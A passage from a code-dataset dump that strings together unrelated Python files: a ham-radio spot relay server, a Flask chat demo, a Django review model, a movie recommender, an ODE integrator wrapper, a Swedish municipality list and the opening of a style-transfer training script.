        # Fix: use the lock as a context manager -- the original
        # acquire()/release() pair would leak the lock if an exception
        # occurred between the two calls.
        with lock:
            clients.append(self)
        logger.info('new connection', extra=self.loginfo)
        if not self.login():
            return
        self.loop()

    def login(self):
        """Prompt for a call sign; return False if the client disconnected."""
        self.socket.send(b'Please enter your call: ')
        call = self.socket.recv(20)
        if not call:
            return False
        self.loginfo['call'] = call.decode('utf-8').strip()
        logger.info('logged in', extra=self.loginfo)
        self.socket.send(b'>\r\n\r\n')
        return True

    def loop(self):
        # Block on the queue and forward each spot until the send fails.
        while True:
            spot = self.queue.get()
            try:
                self.socket.send(spot + b'\r\n')
            except OSError:
                # Fix: narrowed the bare except to socket errors.
                self.terminate()
                break

    def terminate(self):
        """Unregister this client and close its socket."""
        with lock:
            clients.remove(self)
        logger.info('logged out', extra=self.loginfo)
        try:
            self.socket.shutdown(socket.SHUT_RDWR)
            self.socket.close()
        except OSError:
            # Socket may already be closed by the peer; nothing to do.
            pass

    def sendSpot(self, spot):
        """Thread-safe: enqueue a spot for delivery to this client."""
        self.queue.put(spot)
class RelayClient(threading.Thread):
    """Upstream connection to the reverse beacon network; fans spots out to
    every registered RelayServer."""

    def __init__(self):
        threading.Thread.__init__(self)
        self.skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    def run(self):
        self.skt.connect(('telnet.reversebeacon.net', 7000))
        self.login()
        self.loop()

    def login(self):
        # Consume the banner, send our call sign, discard the ack.
        # (Fix: dropped the unused `msg` local.)
        self.skt.recv(1024)
        self.skt.send(b'PD7LOL\r\n')
        self.skt.recv(1024)

    def loop(self):
        loginfo = {'clientip': '', 'call': ''}
        while True:
            spots = self.skt.recv(1024)
            if not spots:
                # Fix: recv() returning b'' means the upstream closed the
                # connection -- the original looped forever on empty reads.
                break
            for spot in spots.split(b'\r\n'):
                spot = spot.strip()
                if spot == b'':
                    continue
                loginfo['clientip'] = len(clients)
                logger.debug(spot.decode('utf-8'), extra=loginfo)
                # Fix: hold the clients lock via a context manager so it is
                # released even if a client's queue raises.
                with lock:
                    for client in clients:
                        client.sendSpot(spot)
if __name__ == '__main__':
    # Accept relay clients on port 7000 and start the upstream feed thread.
    skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    skt.bind(('', 7000))
    skt.listen(4)
    client = RelayClient()
    client.start()
    while True:
        RelayServer(skt.accept()).start()
|
987,129 | 8e8b282e18b02f5e2fdc9671d45ddf8e8b1b6cd2 | c = get_config()
# JupyterHub/everware configuration; `load_subconfig` and the config object
# `c` (from get_config() above) are injected by JupyterHub at load time.
load_subconfig('etc/base_config.py')
c.JupyterHub.authenticator_class = 'everware.DummyTokenAuthenticator'
c.Spawner.start_timeout = 120
c.Spawner.http_timeout = 120 # docker sometimes doesn't show up for a while
987,130 | b0dd05a2ff4f019630dd666ecb3f278a5a5bc761 | import numpy as np
import matplotlib.pyplot as plt
# 9x9 grid world: 1 = traversable cell, 0 = wall/unavailable cell
# (the outer border is entirely walls).
world = np.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 1, 1, 1, 1, 0, 1, 0, 0],
                  [0, 1, 1, 0, 0, 0, 1, 1, 0],
                  [0, 1, 1, 1, 0, 1, 1, 1, 0],
                  [0, 1, 1, 1, 1, 0, 1, 1, 0],
                  [0, 1, 1, 1, 1, 1, 1, 1, 0],
                  [0, 1, 0, 1, 1, 1, 1, 1, 0],
                  [0, 1, 0, 1, 1, 1, 1, 1, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0]])
# Reward per cell (same layout as `world`); nonzero values mark goal cells.
reward = np.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
                   [0, 0, 1, 0, 0, 0, 0, 0, 0],
                   [0, 1, 0, 0, 0, 0, 0, 0, 0],
                   [0, 0, 0, 2, 0, 0, 0, 0, 0],
                   [0, 0, 0, 0, 0, 0, 0, 0, 0],
                   [0, 0, 0, 0, 0, 0, 0, 0, 0],
                   [0, 0, 0, 0, 0, 0, 0, 0, 0],
                   [0, 1, 0, 0, 2, 0, 0, 0, 0],
                   [0, 0, 0, 0, 0, 0, 0, 0, 0]])
# plot world
plt.imshow(world)
plt.title("1 : available position\n0 : not available position")
plt.colorbar()
plt.savefig("images/world.pdf")
plt.close()
# plot reward
plt.imshow(reward)
plt.title("reward")
plt.colorbar()
plt.savefig("images/reward.pdf")
plt.close()
# Persist both grids for downstream scripts.
np.save("world.npy", world)
np.save("reward.npy", reward)
|
987,131 | 0a342aa5b98dc92eb518205fd59c55d66f47dca9 | import pandas as pd
import numpy as np
from ast import literal_eval
import warnings; warnings.simplefilter('ignore')
# Load Movies md
md = pd.read_csv('data/movies_metadata.csv', low_memory=False)
# Print the first three rows
#print(md.head(3))
# Parse the stringified list of genre dicts into a plain list of genre names.
md['genres'] = md['genres'].fillna('[]').apply(literal_eval).apply(lambda x: [i['name'] for i in x] if isinstance(x, list) else [])
# Release year extracted from release_date.
# NOTE(review): `x != np.nan` is always True (NaN compares unequal to
# everything), so the else-branch never runs and invalid dates become the
# string 'NaT'.
md['year'] = pd.to_datetime(md['release_date'], errors='coerce').apply(lambda x: str(x).split('-')[0] if x != np.nan else np.nan)
def popularity(percentile=0.95):
    """Top-10 movies by IMDB weighted rating, read from the global `md`.

    Weighted rating WR = v/(v+m)*R + m/(v+m)*C, where v is the movie's vote
    count, R its average vote, m the vote-count cutoff (given percentile of
    all counts) and C the mean vote across all movies.
    """
    vote_counts = md[md['vote_count'].notnull()]['vote_count'].astype('int')
    vote_averages = md[md['vote_average'].notnull()]['vote_average'].astype('int')
    C = vote_averages.mean()
    m = vote_counts.quantile(percentile)
    # Keep only movies with enough votes to qualify.
    qualified = md[(md['vote_count'] >= m) & (md['vote_count'].notnull()) & (md['vote_average'].notnull())][['title', 'year', 'vote_count', 'vote_average', 'popularity', 'genres']]
    qualified['vote_count'] = qualified['vote_count'].astype('int')
    qualified['vote_average'] = qualified['vote_average'].astype('int')
    qualified['score'] = qualified.apply(lambda x: (x['vote_count']/(x['vote_count']+m) * x['vote_average']) + (m/(m+x['vote_count']) * C), axis=1)
    qualified = qualified.sort_values('score', ascending=False).head(10)
    return qualified
# Explode the genres list into one row per (movie, genre) pair.
s = md.apply(lambda x: pd.Series(x['genres']),axis=1).stack().reset_index(level=1, drop=True)
s.name = 'genre'
gen_md = md.drop('genres', axis=1).join(s)
def popularity_by_genre(genre, percentile=0.85):
    """Top-250 movies of one genre by the same weighted-rating formula,
    read from the global exploded frame `gen_md`."""
    df = gen_md[gen_md['genre'] == genre]
    vote_counts = df[df['vote_count'].notnull()]['vote_count'].astype('int')
    vote_averages = df[df['vote_average'].notnull()]['vote_average'].astype('int')
    C = vote_averages.mean()
    m = vote_counts.quantile(percentile)
    qualified = df[(df['vote_count'] >= m) & (df['vote_count'].notnull()) & (df['vote_average'].notnull())][['title', 'year', 'vote_count', 'vote_average', 'popularity']]
    qualified['vote_count'] = qualified['vote_count'].astype('int')
    qualified['vote_average'] = qualified['vote_average'].astype('int')
    qualified['score'] = qualified.apply(lambda x: (x['vote_count']/(x['vote_count']+m) * x['vote_average']) + (m/(m+x['vote_count']) * C), axis=1)
    qualified = qualified.sort_values('score', ascending=False).head(250)
    return qualified
#print(popularity_by_genre('Adventure').head(15))
#print(popularity())
|
987,132 | 3dcdbdeeb3e2401e4e1c6eb6302ecd1787574135 | import cPickle
import threading
from Client import client
from python.src.shared.actions.basetorobot.getlinetra import GetLineTra
from python.src.shared.actions.basetorobot.startrobot import StartRobot
from python.src.shared.actions.basetorobot.newturn import NewTurn
class Base():
    """Client-side facade: pickles action objects and sends them to the robot."""
    def __init__(self):
        self._client = client()
    def __send(self, action):
        # Actions are serialised with cPickle before going over the socket.
        self._client.send(cPickle.dumps(action))
    def setObstacle(self,x1,y1,x2,y2):
        # Remember the obstacle's two corner points for the next StartRobot call.
        self.Ox1 = x1
        self.Oy1 = y1
        self.Ox2 = x2
        self.Oy2 = y2
    def connectToRobot(self, ip, port):
        # Connect and start the client's listening loop.
        self._client.connect(ip, int(port))
        self._client.listen()
    def NewTurn(self):
        self.__send(NewTurn())
    def StartRobot(self):
        # NOTE(review): requires setObstacle() to have been called first,
        # otherwise the Ox1/Oy1/Ox2/Oy2 attributes do not exist.
        self.__send(StartRobot(self.Ox1,self.Oy1,self.Ox2,self.Oy2))
|
987,133 | 385b95133c0e3c085a5a1913291605a4b004f58e | size_valid = 0.15
# Source CSVs from the Kaggle classify-leaves competition.
# NOTE(review): train and test point at different roots
# (~/competition/... vs ~/data/dataset/...) -- confirm this is intentional.
path_raw_train_csv = '/home/muyun99/competition/classification/data/kaggle_classify_leaves/classify-leaves/train.csv'
path_raw_test_csv = '/home/muyun99/data/dataset/competition_data/kaggle_classify_leaves/classify-leaves/test.csv'
# Output locations for the generated splits and the class-name mapping.
path_save_trainval_csv = '/home/muyun99/competition/classification/data/kaggle_classify_leaves/dataset'
path_save_test_csv = '/home/muyun99/competition/classification/data/kaggle_classify_leaves/dataset'
path_save_classmap_txt = '/home/muyun99/competition/classification/data/kaggle_classify_leaves/dataset/classmap.txt'
path_train_img = '/home/muyun99/competition/classification/data/kaggle_classify_leaves/classify-leaves/images'
# Cross-validation folds and RNG seed for reproducible splits.
num_KFold = 5
seed_random = 2021
|
987,134 | bba87a4d9d6d052a4e983c7180c6784ba545485d | '''
Diêgo C. Oliveira
Tec. em Informática | IFPI
Programação para Web | Ritomar Torquato
Turma 386, Periodo 2017.1
Escreva um programa que pergunte a quantidade de km percorridos por um carro alugado pelo usuário, assim como a
quantidade de dias pelos quais o carro foi alugado. Calcule o preço a pagar, sabendo que o carro custa R$ 60,00 por dia
e R$ 0,15 por km rodado.
'''
# Cost model: R$ 60.00 per rental day plus R$ 0.15 per km driven.
km = float(input('Digite os km rodados: '))
dias = int(input('Quantidade de dias: '))
preço = 60*dias + 0.15*km
print('\nTotal a pagar: R$ %.2f' %preço)
987,135 | 3ed861c2fa588cac94326a28dcb2cf8565b72ea6 | import math
def update_category_max(category_max, category_min, category_size):
    # Upper bound of the bucket that starts at category_min.
    # NOTE(review): `category_max` is unused -- kept only for interface parity.
    return category_min + category_size
def get_size_of_categories(number_of_categories):
    """Width of each colour bucket when the 0-255 range is split evenly."""
    # Integer floor division is equivalent to math.floor(255 / n) for ints.
    return 255 // number_of_categories
def get_category_median(category_min, category_size):
    """Midpoint (rounded up) of a bucket starting at *category_min*."""
    half_rounded_up = -(-category_size // 2)  # integer ceil(category_size / 2)
    return category_min + half_rounded_up
def create_category(category_max, category_min, category_size):
    """Bundle one colour bucket's bounds and rounded-up midpoint in a dict."""
    return {
        'min': category_min,
        'max': category_max,
        # Inlined median computation: lower bound plus half the width,
        # rounded up (same result as the get_category_median helper).
        'median': category_min + math.ceil(category_size / 2),
    }
def update_category_min(category_max, category_min):
    # Lower bound of the next bucket: one above the previous upper bound.
    # NOTE(review): `category_min` is unused -- kept only for interface parity.
    return category_max + 1
def get_colour_categories(number_of_categories):
    """Split the 0-255 channel range into equally sized colour buckets.

    Each bucket is a dict with 'min', 'max' and 'median' keys.
    NOTE(review): because bounds are inclusive and buckets are width+1 values
    wide, the last bucket's 'max' can exceed 255 (behaviour preserved from
    the original implementation).
    """
    width = math.floor(255 / number_of_categories)
    buckets = []
    lower = 0
    for _ in range(number_of_categories):
        upper = lower + width
        buckets.append({
            'min': lower,
            'max': upper,
            'median': lower + math.ceil(width / 2),
        })
        lower = upper + 1
    return buckets
def get_categories(red_category_number, green_category_number, blue_category_number):
    """Build per-channel bucket lists for an RGB colour space.

    :param red_category_number: number of buckets for the red channel
    :param green_category_number: number of buckets for the green channel
    :param blue_category_number: number of buckets for the blue channel
    :return: dict with 'red'/'green'/'blue' keys, each a list of bucket
        dicts as produced by get_colour_categories
    """
    # Fix: removed the unused min_limit/max_limit locals.
    rgb_categories = {
        'red' : get_colour_categories(red_category_number),
        'green' : get_colour_categories(green_category_number),
        'blue' : get_colour_categories(blue_category_number)
    }
    return rgb_categories
|
987,136 | 58f479dc89ae783d57d96d3750ab4383f03265b3 | from django.db import models
from products.models import Products
from users.models import CustomUser
class Review(models.Model):
    """A user's rating and text review of a product."""
    id = models.AutoField(null=False, blank=False, primary_key=True)
    products_id = models.ForeignKey(Products, on_delete=models.RESTRICT)
    user_id = models.ForeignKey(CustomUser, on_delete=models.RESTRICT, related_name='+')
    description = models.CharField(null=False, blank=False, max_length=225)
    rate = models.IntegerField(null=False, blank=False, default=0)
    # Fix: created_at must be set once at insert time (auto_now_add); the
    # original used auto_now, which rewrote the timestamp on every save.
    # (Requires a migration.)
    created_at = models.DateTimeField(null=False, blank=False, auto_now_add=True)
    updated_at = models.DateTimeField(null=False, blank=False, auto_now=True)
    created_user = models.ForeignKey(CustomUser, on_delete=models.RESTRICT, related_name='+')
    updated_user = models.ForeignKey(CustomUser, on_delete=models.RESTRICT, related_name='+')
    is_archived = models.BooleanField(null=False, blank=False, default=False)

    def __str__(self):
        # .format already returns a str; dropped the redundant str() wrapper.
        return 'Products: {}'.format(self.products_id)
|
987,137 | 533e8603e44b5854aae8fb23d9a6005cdc3e8b17 | import os
from datetime import datetime
from flask import Flask, redirect, render_template, request, session
app = Flask(__name__)
# NOTE(review): hard-coded secret key -- acceptable for a demo, but should
# come from the environment in anything deployed.
app.secret_key = "random123"
# In-memory chat history; lost on restart and shared by all users.
messages = []
def add_message(username, message):
    """Append a timestamped chat line to the in-memory history."""
    now = datetime.now().strftime("%H:%M:%S")
    messages.append("({}) {}: {}".format(now, username, message))
def get_all_message():
    """Return the chat history joined with HTML line breaks."""
    return "<br>".join(messages)
@app.route('/', methods =["GET", "POST"])
def index():
    """Main Page with instructions"""
    # A POSTed form stores the username in the session; any session that
    # already has a username is redirected straight to its chat page.
    if request.method == "POST":
        session["username"] = request.form["username"]
    if "username" in session:
        return redirect(session["username"])
    return render_template("index.html")
@app.route('/<username>')
def user(username):
    """Render the chat page: a greeting followed by the full history."""
    return f"<H1>Welcome, {username}</H1>{get_all_message()}"
@app.route('/<username>/<message>')
def send_message(username, message):
    """Record a new chat message, then bounce back to the user's chat page."""
    add_message(username, message)
    return redirect(f"/{username}")
# Bind to Cloud9-style IP/PORT environment variables; debug mode is for
# development only.
app.run(host=os.getenv('IP'), port=int(os.getenv('PORT')),debug=True)
987,138 | 209f41198bf1bb92ba35b1bfd796ecaa4f5e8ef3 | """File linked with 'main_user.py' """
import pymysql.cursors
try:
import config
except ImportError:
print("No configuration file found")
exit()
def host():
    """ Display the 'home menu' and return the user's validated choice (1-3). """
    print(""" Bienvenue sur l'application Pur Beurre
    --------------------------------------------
    1: Quel aliment souhaitez-vous remplacer ?
    2: Retrouver mes aliments substitués
    3: Quitter""")
    # Re-prompt until the input parses as an int in 1..3.
    while True:
        try:
            choice = int(input("Entrez votre choix: \n"))
            if choice in range(1, 4):
                break
        except ValueError:
            continue
    return choice
class Interface:
    """ Class which generate the User interface and useful
    to connect on your database (put your own information's connection
    to access to your database) """
    def __init__(self):
        # Connection settings come from the external `config` module.
        self.connection = pymysql.connect(host= config.DATABASE_HOST,
                                          user= config.DATABASE_USER,
                                          password= config.DATABASE_PASSWORD,
                                          db= config.DATABASE_NAME,
                                          charset= config.DATABASE_CHARSET)
        self.cursor = self.connection.cursor()
    def categories_choice(self):
        """ Display the category menu , limited to 5 choices"""
        self.cursor.execute(""" SELECT id, name
                            FROM category
                            ORDER BY id LIMIT 5 OFFSET 0""")
        rows = self.cursor.fetchall()
        print("Choisissez votre catégorie :")
        possible_choice = []
        # Loop until the user types one of the listed category ids.
        # NOTE(review): the menu is re-printed (and ids re-appended) on every
        # invalid attempt because the for-loop sits inside the while loop.
        while True:
            try:
                for row in rows:
                    possible_choice.append(row[0])
                    print(row[0], row[1])
                choice = int(input("Entrez votre choix: \n"))
                if choice in possible_choice:
                    break
            except ValueError:
                continue
        return choice
    def food_choice(self, category_id):
        """ Display the 'food menu' """
        # Only foods with nutriscore worse than 'b' qualify for substitution;
        # `&&` is MySQL-specific AND.
        self.cursor.execute(""" SELECT food.id, food.name
                            FROM food
                            INNER JOIN category_food
                            ON food.id = category_food.food_id
                            WHERE category_food.category_id = %s && nutriscore > 'b'
                            ORDER BY id LIMIT 8 OFFSET 0""", category_id)
        rows = self.cursor.fetchall()
        print("Choisissez votre aliment :")
        possible_choice = []
        # Same re-prompt loop as categories_choice.
        while True:
            try:
                for row in rows:
                    possible_choice.append(row[0])
                    print(row[0], row[1])
                choice = int(input("Entrez votre choix: \n"))
                if choice in possible_choice:
                    break
            except ValueError:
                continue
        return choice
    def insert_in_favourite(self, food_id, substitute_id):
        """ Menu which allow the user to save his current research """
        ref = (food_id, substitute_id)
        print("""\n Souhaitez-vous ajouter cette recherche dans vos favoris ?
        1. Oui
        0. Non """)
        choice = int(input("Entrez votre choix: \n"))
        if choice == 1:
            # NOTE(review): no self.connection.commit() after the INSERT --
            # with autocommit disabled this row may never be persisted; verify.
            self.cursor.execute("""INSERT INTO favourite
                                (food_id, substitute_id)
                                VALUES (%s, %s)""", ref)
        else:
            return
    def substitute_display(self, category_id, food_id):
        """ When the user has choosen his food, display a substitute healthier
        with all the informations needed"""
        ref = category_id, food_id
        # Best-nutriscore food in the same category, excluding the chosen one.
        self.cursor.execute(""" SELECT food.name, store.name,
                            food.link_openffacts,
                            food.nutriscore, food.description, food.id
                            FROM food
                            INNER JOIN store_food
                            ON food.id = store_food.food_id
                            INNER JOIN store
                            ON store_food.store_id = store.id
                            WHERE food.id IN (SELECT category_food.food_id
                            FROM category_food
                            WHERE category_food.category_id = %s)
                            AND food.id != %s
                            ORDER BY food.nutriscore
                            LIMIT 1 OFFSET 0""", ref)
        row = self.cursor.fetchone()
        print("Voici un subistitut de votre choix initial : ")
        print("Nom du produit : " + row[0])
        print("Grade nutriscore : " + row[3])
        print("Lien OpenFoodFacts : " + row[2])
        print("Magasin(s) : " + row[1])
        print("Description du produit : " + row[4])
        # Return the substitute's food id for a possible favourite insert.
        return row[5]
    def favourite_screen(self):
        """Display all the foods that the user saved previously """
        self.cursor.execute(""" SELECT *
                            FROM favourite
                            ORDER BY id """)
        rows = self.cursor.fetchall()
        print("Voici vos recherches sauvegardées: \n")
        for row in rows:
            # row = (id, food_id, substitute_id); resolve both names.
            ref = row[1], row[2]
            self.cursor.execute(""" SELECT name
                                FROM food
                                WHERE id = %s
                                UNION
                                SELECT name
                                FROM food
                                WHERE id = %s """, ref)
            food_names = self.cursor.fetchall()
            # First name printed as the original product, second as its substitute.
            i = 0
            for element in food_names:
                if i == 0:
                    print("Produit initial : " + element[0].upper(), end="")
                    i += 1
                else:
                    print(" substitué par : " + element[0].upper())
            print("----------------------------------------------------------")
|
987,139 | 224731f0292b04850d348d9d7fcf24c2694cd34d | ########################################
## @file rk_integrator.py
# @brief Contains the class of RK ODE integrator
# @author Zhisong Qu (zhisong.qu@anu.edu.au)
#
from .base_integrator import BaseIntegrator
from scipy.integrate import ode
import numpy as np
## RKIntegrator wraps the explicit Runge-Kutta implimented in scipy.integrate.ode. for use of pyoculus
#
# Default integrator for pyoculus. Not very fast but versatile and robust.
#
# See __init__ for how to set up the integrator
class RKIntegrator(BaseIntegrator):
    def __init__(self, params):
        """! Sets up the ODE solver
        @param params dict, the parameters used in the ODE solver
        <code>params['ode']</code> -- callable f: rhs=f(t,x,arg1), must provide
        <code>params['args']=None</code> -- the argment that will be used to call f
        <code>params['rtol']=1e-7</code> -- relative tolerance
        <code>params['type']='dopri5'</code> -- the type of integrator, 'dopri5' for RK45, 'dop853' for RK853
        """
        # NOTE(review): default values are written back into the caller's
        # params dict (mutated in place); callers sharing the dict will
        # observe the changes.
        # check if the ode is provided. If not, raise an error
        if "ode" not in params.keys():
            raise ValueError("Please specify the ODE to solve for the Integrator class")
        else:
            self.rhs = params["ode"]
        if "type" not in params.keys():
            params["type"] = "dopri5"  # set default to RK45
        if params["type"] not in ["dopri5", "dop853"]:
            raise ValueError(
                "Please specify the correct type of RK solver, dopri5 for RK45, dop853 for RK853"
            )
        if "rtol" not in params.keys():
            params["rtol"] = 1e-7  # set to default value
        self.rtol = params["rtol"]
        if "args" not in params.keys():
            params["args"] = None
        self.args = params["args"]
        # set up the integrator
        self.integrator = ode(self.rhs).set_integrator(
            params["type"], rtol=params["rtol"]
        )
        super().__init__(params)
    def set_initial_value(self, t, x):
        """! Sets up the initial value for the ODE solver
        @param t the start of time
        @param x the start of coordinates
        """
        self.integrator.set_initial_value(x, t).set_f_params(self._params["args"])
        # Probe-call the rhs once so a bad signature fails fast here rather
        # than deep inside scipy.
        try:
            testoutput = self.rhs(t, x, self.args)
        except:
            # NOTE(review): bare except, but it re-raises after the message,
            # so nothing is swallowed.
            print("ODE function not callable")
            raise
        super().set_initial_value(t, x)
    def integrate(self, tend):
        """! Integrates the ODE until `tend`
        @param tend the target end time
        @returns the new value of x
        """
        x_new = self.integrator.integrate(tend)
        if not self.integrator.successful():
            raise Exception("Integration failed")
        # Mirror scipy's state on self so copies/readers see current (t, x).
        self.x = x_new
        self.t = tend
        return x_new
    def copy(self):
        """! Returns a copy of self, to use if want to compute in parallel
        @returns a copy of self
        """
        # set up a new integrator
        # NOTE(review): the new instance shares the same params dict; it does
        # not inherit the current (t, x) state.
        return RKIntegrator(self._params)
    @staticmethod
    def _test_fun(t, y, args):
        # Simple harmonic-oscillator-like test rhs used in examples/tests.
        return [0.1 * np.cos(y[1]), -y[0]]
|
987,140 | 0e97cfa1d77d436ea8242b9ce69c30628f5b5d89 | MuniList = ['Ödeshög',
'Åtvidaberg',
'Boxholm',
'Finspång',
'Kinda',
'Linköping',
'Mjölby',
'Motala',
'Norrköping',
'Söderköping',
'Vadstena',
'Valdemarsvik',
'Ydre',
'Karlshamn',
'Karlskrona',
'Olofström',
'Ronneby',
'Sölvesborg',
'Älvdalen',
'Avesta',
'Borlänge',
'Falun',
'Gagnef',
'Hedemora',
'Leksand',
'Ludvika',
'Malung',
'Mora',
'Orsa',
'Rättvik',
'Säter',
'Smedjebacken',
'Vansbro',
'Bollnäs',
'Gävle',
'Hofors',
'Hudiksvall',
'Ljusdal',
'Nordanstig',
'Ockelbo',
'Ovanåker',
'Söderhamn',
'Sandviken',
'Gotland',
'Falkenberg',
'Halmstad',
'Hylte',
'Kungsbacka',
'Laholm',
'Varberg',
'Östersund',
'Åre',
'Berg',
'Bräcke',
'Härjedalen',
'Krokom',
'Ragunda',
'Strömsund',
'Aneby',
'Eksjö',
'Gislaved',
'Gnosjö',
'Jönköping',
'Nässjö',
'Sävsjö',
'Tranås',
'Värnamo',
'Vaggeryd',
'Vetlanda',
'Borgholm',
'Emmaboda',
'Högsby',
'Hultsfred',
'Kalmar',
'Mönsterås',
'Mörbylånga',
'Nybro',
'Oskarshamn',
'Torsås',
'Västervik',
'Vimmerby',
'Älmhult',
'Alvesta',
'Lessebo',
'Ljungby',
'Markaryd',
'Tingsryd',
'Uppvidinge',
'Växjö',
'Överkalix',
'Övertorneå',
'Älvsbyn',
'Arjeplog',
'Arvidsjaur',
'Boden',
'Gällivare',
'Haparanda',
'Jokkmokk',
'Kalix',
'Kiruna',
'Luleå',
'Pajala',
'Piteå',
'Örebro',
'Askersund',
'Degerfors',
'Hällefors',
'Hallsberg',
'Karlskoga',
'Kumla',
'Laxå',
'Lekeberg',
'Lindesberg',
'Ljusnarsberg',
'Nora',
'Eskilstuna',
'Flen',
'Gnesta',
'Katrineholm',
'Nyköping',
'Oxelösund',
'Strängnäs',
'Trosa',
'Vingåker',
'Örkelljunga',
'Östra Göinge',
'Ängelholm',
'Åstorp',
'Båstad',
'Bjuv',
'Bromölla',
'Burlöv',
'Eslöv',
'Hässleholm',
'Höör',
'Höganäs',
'Hörby',
'Helsingborg',
'Kävlinge',
'Klippan',
'Kristianstad',
'Landskrona',
'Lomma',
'Lund',
'Malmö',
'Osby',
'Perstorp',
'Simrishamn',
'Sjöbo',
'Skurup',
'Staffanstorp',
'Svalöv',
'Svedala',
'Tomelilla',
'Trelleborg',
'Vellinge',
'Ystad',
'Österåker',
'Botkyrka',
'Danderyd',
'Ekerö',
'Haninge',
'Huddinge',
'Järfälla',
'Lidingö',
'Nacka',
'Norrtälje',
'Nykvarn',
'Nynäshamn',
'Södertälje',
'Salem',
'Sigtuna',
'Sollentuna',
'Solna',
'Stockholm',
'Sundbyberg',
'Täby',
'Tyresö',
'Upplands-Bro',
'Upplands-Väsby',
'Värmdö',
'Vallentuna',
'Vaxholm',
'Östhammar',
'Älvkarleby',
'Enköping',
'Håbo',
'Knivsta',
'Tierp',
'Uppsala',
'Årjäng',
'Arvika',
'Eda',
'Filipstad',
'Forshaga',
'Grums',
'Hagfors',
'Hammarö',
'Karlstad',
'Kil',
'Kristinehamn',
'Munkfors',
'Säffle',
'Storfors',
'Sunne',
'Torsby',
'Åsele',
'Bjurholm',
'Dorotea',
'Lycksele',
'Malå',
'Nordmaling',
'Norsjö',
'Robertsfors',
'Skellefteå',
'Sorsele',
'Storuman',
'Umeå',
'Vännäs',
'Vilhelmina',
'Vindeln',
'Örnsköldsvik',
'Ånge',
'Härnösand',
'Kramfors',
'Sollefteå',
'Sundsvall',
'Timrå',
'Arboga',
'Fagersta',
'Hallstahammar',
'Heby',
'Köping',
'Kungsör',
'Norberg',
'Sala',
'Skinnskatteberg',
'Surahammar',
'Västerås',
'Öckerö',
'Åmål',
'Ale',
'Alingsås',
'Bengtsfors',
'Bollebygd',
'Borås',
'Dals-Ed',
'Essunga',
'Färgelanda',
'Falköping',
'Göteborg',
'Götene',
'Grästorp',
'Gullspång',
'Härryda',
'Habo',
'Herrljunga',
'Hjo',
'Karlsborg',
'Kungälv',
'Lerum',
'Lidköping',
'Lilla Edet',
'Lysekil',
'Mölndal',
'Mariestad',
'Mark',
'Mellerud',
'Mullsjö',
'Munkedal',
'Orust',
'Partille',
'Skövde',
'Skara',
'Sotenäs',
'Stenungsund',
'Strömstad',
'Svenljunga',
'Töreboda',
'Tanum',
'Tibro',
'Tidaholm',
'Tjörn',
'Tranemo',
'Trollhättan',
'Uddevalla',
'Ulricehamn',
'Vänersborg',
'Vårgårda',
'Vara'] |
987,141 | 70fea78b60e9485481b4b7fe05dcc16f126c0d0b | import matplotlib.pyplot as plt
def get_points(coordinates):
    """Split coordinate triples into three parallel x/y/z lists.

    The y component is negated (mirrors points across the xz-plane).
    """
    xs, ys, zs = [], [], []
    for point in coordinates:
        xs.append(point[0])
        ys.append(-point[1])
        zs.append(point[2])
    return xs, ys, zs
def visualize_coordinates(coordinates, path=None):
    """Render *coordinates* as a 3D scatter plot; optionally overlay *path* as a red line."""
    axes = plt.axes(projection='3d')
    axes.set_xlabel('x axis')
    axes.set_ylabel('y axis')
    axes.set_zlabel('z axis')
    # unpack the (xs, ys, zs) triple straight into the scatter call
    axes.scatter3D(*get_points(coordinates), s=1)
    if path:
        path_x, path_y, path_z = get_points(path)
        axes.plot3D(path_x, path_y, path_z, 'red')
    plt.show()
|
987,142 | f38f41653140d9f1b33834be929557526ce89b13 | class Solution(object):
def containsDuplicate(self, nums):
for i in range(0,nums.__len__()-1):
for j in range(i+1,nums.__len__()):
if nums[i] == nums[j]:
return True
return False
s = Solution()
print(s.containsDuplicate([1,2,3,1]))
|
987,143 | 20fd374f3c607992f9ba724402db5ce45325d53d | import argparse
from pathlib import Path
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torch.utils.data as data
from PIL import Image, ImageFile
from tensorboardX import SummaryWriter
from torchvision import transforms
from tqdm import tqdm
import net
from sampler import InfiniteSamplerWrapper
cudnn.benchmark = True
Image.MAX_IMAGE_PIXELS = None # Disable DecompressionBombError
# Disable OSError: image file is truncated
ImageFile.LOAD_TRUNCATED_IMAGES = True
def train_transform():
    """Training-time preprocessing: resize to 512x512, take a random 256 crop, convert to tensor."""
    return transforms.Compose([
        transforms.Resize(size=(512, 512)),
        transforms.RandomCrop(256),
        transforms.ToTensor(),
    ])
class FlatFolderDataset(data.Dataset):
    """Dataset over every file sitting directly inside a single folder, loaded as RGB images."""

    def __init__(self, root, transform):
        super(FlatFolderDataset, self).__init__()
        self.root = root
        self.paths = list(Path(self.root).glob('*'))
        self.transform = transform

    def __getitem__(self, index):
        # decode lazily: only the requested file is opened
        image = Image.open(str(self.paths[index])).convert('RGB')
        return self.transform(image)

    def __len__(self):
        return len(self.paths)

    def name(self):
        return 'FlatFolderDataset'
def adjust_learning_rate(optimizer, iteration_count):
    """Imitating the original implementation: inverse-time lr decay.

    Reads lr / lr_decay from the module-level ``args`` namespace.
    """
    decayed = args.lr / (1.0 + args.lr_decay * iteration_count)
    for group in optimizer.param_groups:
        group['lr'] = decayed
parser = argparse.ArgumentParser()
# Basic options
parser.add_argument('--content_dir', type=str, required=True,
help='Directory path to a batch of content images')
parser.add_argument('--style_dir', type=str, required=True,
help='Directory path to a batch of style images')
parser.add_argument('--vgg', type=str, default='models/vgg_normalised.pth')
# training options
parser.add_argument('--save_dir', default='./experiments',
help='Directory to save the model')
parser.add_argument('--log_dir', default='./logs',
help='Directory to save the log')
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--lr_decay', type=float, default=5e-5)
parser.add_argument('--max_iter', type=int, default=160000)
parser.add_argument('--batch_size', type=int, default=8)
parser.add_argument('--style_weight', type=float, default=10.0)
parser.add_argument('--content_weight', type=float, default=1.0)
parser.add_argument('--n_threads', type=int, default=16)
parser.add_argument('--save_model_interval', type=int, default=10000)
args = parser.parse_args()
device = torch.device('cuda')
save_dir = Path(args.save_dir)
save_dir.mkdir(exist_ok=True, parents=True)
log_dir = Path(args.log_dir)
log_dir.mkdir(exist_ok=True, parents=True)
writer = SummaryWriter(log_dir=str(log_dir))
decoder = net.decoder
